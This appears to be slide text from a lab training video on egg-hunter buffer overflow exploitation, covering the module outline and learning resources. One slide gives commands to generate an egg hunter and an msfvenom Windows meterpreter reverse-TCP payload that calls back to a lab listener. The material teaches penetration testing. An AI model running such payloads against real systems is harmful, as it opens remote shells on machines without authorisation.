



Uday Mittal
OSCP, CISSP, CISA, CISM
https://yaksas.in

YCSC Lab Exploitation Basics Egg Hunters Part 6

Assumptions



- Knowledge of
 - Assembly level language
 - Kali Linux
 - Spike
 - Immunity Debugger

What to do if I need to learn above?

Check out the resources mentioned at the end of this video

Module Structure



- Introduction
- Fuzzing
- PoC Creation
- Controlling the Execution
- Bad Character Analysis
- Cracking the shell

Generating shellcode & obtaining shell



- Find a place to store our shellcode
- Generate egg hunter code: !mona egg –t YCSC
- msfvenom –p windows/meterpreter/reverse_tcp LHOST=192.168.43.28
 LPORT=4444 –b '\x00' –f python
- multi/handler to listen to the reverse connection sent by the target machine over port 4444

Learning Resources



- **Kali Linux** Kali Linux Revealed by Offensive Security (https://www.kali.org/download-kali-linux-revealed-book/)
- Metasploit Metasploit: The Penetration Tester's Guide by David Kennedy, Jim O'Gorman, Devon Kearns,
 Mati Aharoni
- Assembly Language SLAE course by SecurityTube (https://www.pentesteracademy.com/course?id=3)
- Spike An Introduction to Fuzzing: Using fuzzers (SPIKE) to find vulnerabilities
- Immunity Debugger Immunity Debugger basics (https://sgros-students.blogspot.com/2014/05/immunity-debugger-basics-part-1.html)
- Exploit Development https://www.fuzzysecurity.com/tutorials.html



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